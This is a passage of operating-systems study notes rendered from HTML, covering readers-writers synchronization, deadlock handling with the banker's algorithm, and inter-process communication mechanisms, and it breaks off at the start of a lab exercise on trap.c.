class="params">(c)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">    <span class="comment">// Note: the condition is tested with if</span></span><br><span class="line">    <span class="keyword">if</span>(count == n)</span><br><span class="line">        notFull.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">    Add c to the buffer;</span><br><span class="line">    count++;</span><br><span class="line">    notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">    lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul></li></ul><h3 id="6-互斥综合：读者-写者问题">6. Mutual Exclusion in Practice: The Readers-Writers Problem</h3><h4 id="a-问题描述">a. Problem Statement</h4><ul><li>Two kinds of users of the shared data<ul><li>Readers: only read the data and never modify it</li><li>Writers: read and modify the data</li></ul></li><li>Problem: reads and writes on the shared data<ul><li>Read-read is allowed: several readers may read at the same time</li><li>Read-write is mutually exclusive: a reader may read only when there is no writer, and a writer may write only when there is no reader.</li><li>Write-write is mutually exclusive: a writer may write only when there is no other writer</li></ul></li></ul><h4 id="b-用信号量解决问题">b. 
Solving It with Semaphores</h4><blockquote><p>The implementation below gives <strong>readers priority</strong>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Reader_Writer</span>&#123;</span><br><span class="line">    mutex WriteMutex = <span class="keyword">new</span> <span class="built_in">mutex</span>(<span class="number">1</span>); <span class="comment">// mutual exclusion between reading and writing</span></span><br><span class="line">    mutex CountMutex = <span class="keyword">new</span> <span class="built_in">mutex</span>(<span class="number">1</span>); <span class="comment">// protects updates to the reader count</span></span><br><span class="line">    <span class="type">int</span> Rcount = <span class="number">0</span>; <span class="comment">// shared variable, must be updated under mutual exclusion</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Write</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        
<span class="built_in">P</span>(WriteMutex);</span><br><span class="line">        write;</span><br><span class="line">        <span class="built_in">V</span>(WriteMutex);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Read</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="built_in">P</span>(CountMutex);</span><br><span class="line">        <span class="keyword">if</span>(Rcount == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">P</span>(WriteMutex);</span><br><span class="line">        ++Rcount;</span><br><span class="line">        <span class="built_in">V</span>(CountMutex);</span><br><span class="line"></span><br><span class="line">        read;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">P</span>(CountMutex);</span><br><span class="line">        --Rcount;</span><br><span class="line">        <span class="keyword">if</span>(Rcount == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">V</span>(WriteMutex);</span><br><span class="line">        <span class="built_in">V</span>(CountMutex);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-优先策略">c. Priority Policies</h4><ul><li>Reader-priority policy<ul><li>As long as some reader is reading, later readers can enter directly</li><li>If readers keep arriving without pause, writers starve</li></ul></li><li>Writer-priority policy<ul><li>As soon as a writer is ready, it should perform its write as early as possible</li><li>If writers keep becoming ready without pause, readers starve</li></ul></li><li>Which policy to use depends on the concrete environment.</li></ul><h4 id="d-用管程解决问题">d. 
Solving It with a Monitor</h4><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Database</span>&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="type">int</span> AR = <span class="number">0</span>; <span class="comment">// active readers</span></span><br><span class="line">    <span class="type">int</span> AW = <span class="number">0</span>; <span class="comment">// active writers</span></span><br><span class="line">    <span class="type">int</span> WR = <span class="number">0</span>; <span class="comment">// waiting readers</span></span><br><span class="line">    <span class="type">int</span> WW = <span class="number">0</span>; <span class="comment">// waiting writers</span></span><br><span class="line">    Lock lock;</span><br><span class="line">    Condition okToRead;</span><br><span class="line">    Condition okToWrite;</span><br><span class="line">    <span class="comment">// A reader starts reading</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">StartRead</span><span 
class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// While a writer is writing or waiting to write</span></span><br><span class="line">        <span class="keyword">while</span>(AW+WW &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// This reader waits for the writers to finish</span></span><br><span class="line">            WR++;</span><br><span class="line">            okToRead.<span class="built_in">wait</span>(&amp;lock);</span><br><span class="line">            WR--;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// The reader starts reading: one more active reader</span></span><br><span class="line">        AR++;</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// A reader finishes reading</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">DoneRead</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// The reader is done: one fewer active reader</span></span><br><span class="line">        AR--;</span><br><span class="line">        <span class="comment">// If no reader is active any more and a writer is waiting</span></span><br><span class="line">        <span class="keyword">if</span>(AR == <span class="number">0</span> &amp;&amp; WW &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// Wake one writer so it can start writing</span></span><br><span class="line">            okToWrite.<span class="built_in">signal</span>();</span><br><span class="line">        lock.<span 
class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// A writer gets ready to write</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">StartWrite</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// While a reader is reading or a writer is writing</span></span><br><span class="line">        <span class="keyword">while</span>(AW+AR &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// This writer waits</span></span><br><span class="line">            WW++;</span><br><span class="line">            okToWrite.<span class="built_in">wait</span>(&amp;lock);</span><br><span class="line">            WW--;</span><br><span class="line">        &#125;</span><br><span class="line">        AW++;</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// A writer finishes writing</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">DoneWrite</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock.<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// This writer has finished its write</span></span><br><span class="line">        AW--;</span><br><span class="line">        <span class="comment">// If a writer is waiting</span></span><br><span class="line">        <span class="keyword">if</span>(WW &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// Wake one waiting writer</span></span><br><span class="line">   
         okToWrite.<span class="built_in">signal</span>();</span><br><span class="line">        <span class="comment">// If no writer is waiting but readers are</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(WR &gt; <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// Wake all waiting readers so they can start reading</span></span><br><span class="line">            okToRead.<span class="built_in">broadcast</span>();</span><br><span class="line">        lock.<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Read</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// wait until no writers</span></span><br><span class="line">        <span class="built_in">StartRead</span>();</span><br><span class="line">        read database;</span><br><span class="line">        <span class="comment">// checkout - wake up waiting writers;</span></span><br><span class="line">        <span class="built_in">DoneRead</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Write</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// wait until no readers/writers</span></span><br><span class="line">        <span class="built_in">StartWrite</span>();</span><br><span class="line">        write database;</span><br><span class="line">        <span class="comment">// checkout - wake up waiting readers/writers;</span></span><br><span class="line">        <span class="built_in">DoneWrite</span>();</span><br><span 
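class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-死锁">7. Deadlock</h3><h4 id="a-死锁概念">a. Deadlock Concepts</h4><h5 id="1-进程访问资源的流程">1) How a Process Accesses Resources</h5><ul><li>Resource types $R_1, R_2, \dots, R_m$: CPU time, memory space, I/O devices, and so on.</li><li>Each resource type $R_i$ has $W_i$ instances</li><li>The steps a process goes through to access a resource<ul><li>Request/acquire: ask for a free resource</li><li>Use/hold: the process occupies the resource</li><li>Release: the resource goes from occupied back to free.</li></ul></li></ul><h5 id="2-资源分类">2) Resource Categories</h5><ul><li>Reusable resources (Reusable Resource)<ul><li>The resource cannot be destroyed, and at any moment only one process can be using it</li><li>After a process releases the resource, other processes can reuse it</li><li>Examples: hardware such as processors and I/O devices, software such as files and databases</li><li>Deadlock is possible: each process holds some resources and requests others</li></ul></li><li>Consumable resources (Consumable Resource)<ul><li>The resource is created and destroyed</li><li>Examples: interrupts, signals, messages</li><li>Deadlock is possible: processes wait for each other's messages</li></ul></li></ul><h5 id="3-出现死锁的必要条件">3) Necessary Conditions for Deadlock</h5><ul><li>Mutual exclusion: at any moment only one process can use a given resource instance</li><li>Hold and wait: a process holds at least one resource while waiting to acquire resources held by other processes</li><li>No preemption: a resource can only be released voluntarily by the process after it has used it</li><li>Circular wait: the processes wait for one another in a cycle</li></ul><h4 id="b-死锁处理方法">b. Handling Deadlock</h4><blockquote><p>Deadlock detection is fairly complex, so deadlocks are usually left to the application to handle and the operating system ignores them</p></blockquote><h5 id="1-死锁预防">1) Deadlock Prevention</h5><blockquote><p>Deadlock prevention (Deadlock Prevention): ensure that the system can never enter a deadlocked state.</p></blockquote><p>Prevention adopts a policy that <strong>restricts</strong> how concurrent processes request resources, so that at no time does the system <strong>satisfy all the necessary conditions for deadlock</strong>.</p><ul><li><p>Mutual exclusion: wrap the mutually exclusive shared resource so that it can be accessed concurrently</p></li><li><p>Hold and wait: require that a process hold no other resource when it requests one. A process may only request everything it needs at once, when it starts executing, but this gives low resource utilization.</p></li><li><p>No preemption: if a process requests a resource that cannot be granted immediately, it releases the resources it already holds. Allocation is performed only when all required resources can be obtained at the same time.</p></li><li><p>Circular wait: impose an order on resources and require processes to request them in that order.</p></li></ul><h5 id="2-死锁避免">2) Deadlock Avoidance</h5><blockquote><p>Deadlock avoidance (Deadlock Avoidance): check before each allocation and grant only those requests that cannot lead to deadlock.</p></blockquote><p>Using extra a priori information, the system decides at allocation time whether deadlock could result, and allocates only when it cannot.</p><ul><li>Processes must declare the <strong>maximum number</strong> of resources they need.</li><li>The numbers of resources <strong>available</strong> and <strong>allocated</strong> are bounded so that each process's <strong>maximum</strong> demand can be met.</li><li>The allocation state is <strong>checked dynamically</strong> to ensure that no circular wait arises.</li></ul><p>Safe states of resource allocation</p><ul><li>When a process requests a resource, the system determines whether it would still be in a safe state after the allocation.</li><li>The system is in a safe state if a safe sequence exists for all processes that hold resources</li><li>The sequence $&lt;P_1, P_2,\dots,P_N&gt;$ is safe if<ul><li>The resources $P_i$ still needs &lt;= currently available resources + resources held by all $P_j$, where <code>j&lt;i</code>.</li><li>If the request of $P_i$ cannot be granted right away, $P_i$ waits for all $P_j(j &lt; 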
i)$ to finish</li><li>Once $P_i$ finishes, $P_{i+1}$ can obtain the resources it needs, run, and release what it was allocated.</li><li>In the end every $P_i$ in the sequence obtains the resources it needs.</li></ul></li></ul><p><strong>Banker's Algorithm</strong> (Banker’s Algorithm)</p><blockquote><p>The banker's algorithm avoids deadlock. It is modeled on how a bank grants loans, and it checks and guarantees that the system stays in a safe state.</p></blockquote><ul><li><p>Data structures used</p><blockquote><p>n = number of threads, m = number of resource types</p></blockquote><ul><li><strong>Max (total demand)</strong>: n x m matrix; thread $T_i$ requests at most $Max[i, j]$ instances of resource type $R_j$</li><li><strong>Available (remaining free)</strong>: vector of length m; $Available[j]$ instances of resource type $R_j$ are currently free</li><li><strong>Allocation (already allocated)</strong>: n x m matrix; thread $T_i$ currently holds $Allocation[i, j]$ instances of $R_j$</li><li><strong>Need (future demand)</strong>: n x m matrix; thread $T_i$ will still need $Need[i,j]$ instances of $R_j$.</li></ul><blockquote><p>$Need[i, j] = Max[i, j] - Allocation[i, j]$</p></blockquote></li><li><p><strong>Safety check</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Work and Finish are vectors of length m and n respectively, initialized below</span></span><br><span class="line">Work[m], Finish[n];</span><br><span class="line"></span><br><span class="line">Work = Available; <span class="comment">// resources currently free</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; n; i++)</span><br><span 
class="line">  Finish[i] = <span class="literal">false</span>; <span class="comment">// thread i has not finished</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// ...every thread starts running and is allocated resources</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Some time later</span></span><br><span class="line"><span class="comment">// Repeatedly look for an unfinished thread Ti whose Need is no larger than Work</span></span><br><span class="line"><span class="keyword">while</span>(Finish[i] == <span class="literal">false</span> &amp;&amp; Need[i] &lt;= Work)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Thread i's remaining need fits within the free resources, so it can run to completion; reclaim everything it holds</span></span><br><span class="line">    Work += Allocation[i];</span><br><span class="line">    Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// If Finish[i] == true for every thread Ti, the system is in a safe state.</span></span><br><span class="line"><span class="keyword">if</span>(Finish == <span class="literal">true</span>)</span><br><span class="line">    Safe;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="comment">// Otherwise the system is in an unsafe state.</span></span><br><span class="line">    NoSafe;</span><br></pre></td></tr></table></figure></li><li><p>Detailed design of the banker's algorithm</p><ul><li><p>Initialization: $Request_i$ is the request vector of thread $T_i$; $Request_i[j]$ is the number of instances of resource $R_j$ that $T_i$ requests</p></li><li><p>Loop:</p><ol><li><p>If $Request_i &lt;= Need[i]$, go to step 2. Otherwise reject the request, because the thread has exceeded its declared maximum.</p></li><li><p>If $Request_i &lt;= Available$, go to step 3. Otherwise $T_i$ must wait, because the resources are not available.</p></li><li><p>Use the safety check to decide whether to allocate the resources to $T_i$</p><ul><li><p>Build the tentative allocation state whose safety is to be checked</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Available = Available - Request_i;</span><br><span class="line">Allocation[i] = Allocation[i] + 
Request_i;</span><br><span class="line">Need[i] = Need[i] - Request_i;</span><br></pre></td></tr></table></figure></li><li><p>Then run the <strong>safety check</strong> described above</p><ul><li>If the result is <strong>safe</strong>, the resources are allocated to $T_i$</li><li>If the result is <strong>unsafe</strong>, the system rejects the request of $T_i$</li></ul></li></ul></li></ol></li></ul></li></ul><h5 id="3-死锁检测和恢复">3) Deadlock Detection and Recovery</h5><blockquote><p>Deadlock detection and recovery (Deadlock Detection &amp; Recovery): recover after detecting that the running system has entered a deadlocked state.</p></blockquote><ul><li><p>Characteristics</p><ul><li>The system is allowed to enter a deadlocked state</li><li>The system maintains a resource-allocation graph</li><li>A deadlock detection algorithm is invoked periodically to search the graph for deadlock</li><li>When deadlock occurs, a recovery mechanism is used to recover from it.</li></ul></li></ul><h6 id="i-死锁检测">i. Deadlock Detection</h6><ul><li><p>Data structures</p><ul><li><strong>Available (remaining free)</strong>: vector of length m; the number of free resources of each type</li><li><strong>Allocation (already allocated)</strong>: n x m matrix; the number of resources of each type currently allocated to each process. Process $P_i$ holds $Allocation[i, j]$ instances of resource $R_j$.</li></ul></li><li><p>Deadlock detection algorithm</p><blockquote><p>This algorithm is similar to the banker's algorithm.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 
Work and Finish are vectors of length m and n respectively, initialized below</span></span><br><span class="line">Work[m], Finish[n];</span><br><span class="line"></span><br><span class="line">Work = Available; <span class="comment">// resources currently free</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; n; i++)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// If the thread being visited holds resources, set its Finish to false</span></span><br><span class="line">    <span class="comment">// Otherwise it holds nothing: it has either already finished or is a thread we do not care about</span></span><br><span class="line">    <span class="keyword">if</span>(Allocation[i] &gt; <span class="number">0</span>)</span><br><span class="line">      Finish[i] = <span class="literal">false</span>; <span class="comment">// thread i has not finished</span></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ...every thread starts running and is allocated resources</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Some time later</span></span><br><span class="line"><span class="comment">// Repeatedly look for an unfinished thread Ti whose Request is no larger than Work</span></span><br><span class="line"><span class="keyword">while</span>(Finish[i] == <span class="literal">false</span> &amp;&amp; Request[i] &lt;= Work)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Thread i's request fits within the free resources, so it can run to completion; reclaim everything it holds</span></span><br><span class="line">    Work += Allocation[i];</span><br><span class="line">    Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// If Finish[i] == true for every thread Ti, the system is not deadlocked</span></span><br><span class="line"><span class="keyword">if</span>(Finish == <span class="literal">true</span>)</span><br><span class="line">    
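NoDeadlock;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="comment">// Otherwise the system is deadlocked.</span></span><br><span class="line">    Deadlock;</span><br></pre></td></tr></table></figure></li><li><p>Using the deadlock detection algorithm</p><ul><li>When and how often to run detection depends on<ul><li>How often deadlock is likely to occur</li><li>How many processes would need to be rolled back</li></ul></li><li>The resource graph may contain several cycles, which makes it hard to tell which process actually "caused" the deadlock</li></ul></li></ul><h6 id="ii-死锁恢复">ii. Deadlock Recovery</h6><ul><li><strong>Process termination</strong><ul><li>Terminate all deadlocked processes</li><li>Terminate one process at a time until the deadlock is resolved</li><li>The order in which to terminate processes should take into account<ul><li>The priority of the process</li><li>How long the process has run and how much longer it still needs</li><li>The resources the process already holds</li><li>The resources the process needs in order to complete</li><li>The number of processes that would be terminated</li><li>Whether the process is interactive or batch</li></ul></li></ul></li><li><strong>Resource preemption</strong><ul><li>Choosing the victim process: aim for minimum cost</li><li>Rollback: return the process to some safe state and restart it from there</li><li>Starvation is possible: the same process may be chosen as the victim every time</li></ul></li></ul><h3 id="8-进程通信">8. Inter-Process Communication</h3><h4 id="a-基本概念">a. Basic Concepts</h4><ul><li><p>Inter-process communication (IPC, Inter-Process Communication) is the mechanism by which processes communicate and synchronize</p></li><li><p>IPC provides two basic operations: send and receive</p></li><li><p>Communication flow</p><ul><li>Establish a communication link between the communicating processes</li><li>Exchange messages through send/receive</li></ul></li><li><p>Characteristics of the communication link</p><ul><li>Physical (e.g. shared memory, hardware bus)</li><li>Logical (e.g. logical properties)</li></ul></li></ul><h5 id="1-直接通信">1) Direct Communication</h5><ul><li>Each process must name its peer explicitly<ul><li>send(P, message) - send a message to process P</li><li>receive(Q, message) - receive a message from process Q</li></ul></li><li>Properties of the communication link<ul><li>The link is established automatically</li><li>One link corresponds to exactly one pair of communicating processes</li><li>There is only one link between each pair of processes</li><li>The link may be unidirectional but is usually bidirectional.</li></ul></li></ul><h5 id="2-间接通信">2) Indirect Communication</h5><ul><li>Messages are sent and received through message queues maintained by the operating system<ul><li>Each message queue has a unique identifier</li><li>Only processes that share the same message queue can communicate.</li></ul></li><li>Properties of the communication link<ul><li>A link exists only between processes that share the same message queue.</li><li>The link may be unidirectional or bidirectional.</li><li>A message queue may be associated with more than two processes.</li></ul></li><li>Communication flow<ul><li>Create a new message queue</li><li>Send or receive messages through the queue</li><li>Destroy the message queue</li></ul></li><li>Basic operations<ul><li>send(A, message) - send a message to queue A</li><li>receive(A, message) - receive a message from queue A</li></ul></li></ul><h5 id="3-阻塞与非阻塞通信">3) 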
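Blocking and Non-Blocking Communication</h5><ul><li>Communication can be blocking (synchronous) or non-blocking (asynchronous)</li><li>Blocking communication<ul><li>Blocking send: after sending, the sender waits until the receiver has successfully received the message</li><li>Blocking receive: after requesting data, the receiver waits until it has successfully received a message</li></ul></li><li>Non-blocking communication<ul><li>Non-blocking send: after sending, the sender can immediately carry on with other work</li><li>Non-blocking receive: if no message has been sent, the receiver's request returns without any message</li></ul></li></ul><h5 id="4-通信链路缓冲">4) Link Buffering</h5><blockquote><p>Messages sent by a process can be buffered on the link in one of three ways</p></blockquote><ul><li>Zero capacity: the sender must wait for the receiver</li><li>Bounded capacity: the sender must wait when the link's buffer queue is full</li><li>Unbounded capacity: the sender never has to wait</li></ul><h4 id="b-信号">b. Signals</h4><ul><li>Signal (signal): a software-interrupt notification and handling mechanism between processes, for example <code>SIGKILL</code>, <code>SIGSTOP</code>, <code>SIGCONT</code></li><li>How a received signal is handled<ul><li>Catch (catch): the signal handler specified by the process is invoked</li><li>Ignore (Ignore): the process installs no handler, so the default action specified by the operating system is performed, for example terminating or suspending the process</li><li>Mask (Mask): the process is prevented from receiving and handling the signal (possibly only temporarily)</li></ul></li><li>Limitation: very little information is conveyed, only the signal type</li></ul><h4 id="c-管道">c. Pipes</h4><ul><li>A pipe (pipe) is an inter-process communication mechanism based on an in-memory file<ul><li>A child process inherits file descriptors from its parent</li><li>Default file descriptors: 0 stdin, 1 stdout, 2 stderr</li><li>A process does not know what is at the other end<ul><li>It may be reading from a keyboard, a file, or a program</li><li>It may be writing to a terminal, a file, or a program</li></ul></li></ul></li><li>System calls related to pipes<ul><li>Read from a pipe: <code>read(fd, buffer, nbytes)</code>. scanf is built on it.</li><li>Write to a pipe: <code>write(fd, buffer, nbytes)</code>. printf is built on it.</li><li>Create a pipe: <code>pipe(rgfd)</code><ul><li><code>rgfd</code> is an array of two file descriptors</li><li><code>rgfd[0]</code> is the read descriptor</li><li><code>rgfd[1]</code> is the write descriptor</li></ul></li></ul></li></ul><h4 id="d-消息队列">d. Message Queues</h4><ul><li>A message queue is an indirect communication mechanism maintained by the operating system whose basic unit is a byte sequence<ul><li>Each message (message) is a byte sequence</li><li>Messages with the same identifier form a message queue (message queue) in first-in, first-out order</li></ul></li><li>System calls for message queues<ul><li><code>msgget(key, flag)</code> : get the message queue identifier</li><li><code>msgsnd(QID, buf, size, flag)</code> : send a message</li><li><code>msgrcv(QID, buf, size, type, flag)</code> : receive a message</li><li><code>msgctl(...)</code>: control the message queue</li></ul></li></ul><h4 id="e-共享内存">e. 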
Shared Memory</h4><ul><li><p>Shared memory is a communication mechanism that maps the same region of physical memory into the address spaces of several processes at once.</p></li><li><p>Sharing between processes</p><ul><li>Each process has its own private address space</li><li>The shared memory segment must be set up explicitly in each process's address space</li></ul></li><li><p>Sharing between threads: threads of the same process always share the same address space</p></li><li><p>Advantage: data is shared quickly and conveniently</p></li><li><p>Disadvantage: an additional synchronization mechanism is required to coordinate access to the data.</p></li><li><p>System calls for shared memory</p><ul><li><code>shmget(key, size, flags)</code> : create a shared segment</li><li><code>shmat(shmid, *shmaddr, flags)</code> : map the shared segment into the process's address space</li><li><code>shmdt(*shmaddr)</code> : unmap the shared segment from the process's address space</li><li><code>shmctl(...)</code> : control the shared segment</li><li>A mechanism such as semaphores is needed to resolve conflicting accesses to the shared memory.</li></ul></li></ul><h2 id="练习解答">Exercise Solutions</h2><h3 id="练习0">Exercise 0</h3><blockquote><p>Fill in the code from the previous labs.</p></blockquote><p>Search for the keyword <code>Lab7</code>. The only change needed is in lab6's <code>kern/trap/trap.c</code>, where the following code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">        <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>is replaced with the code below.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks ++;</span><br><span class="line">        <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">        <span 
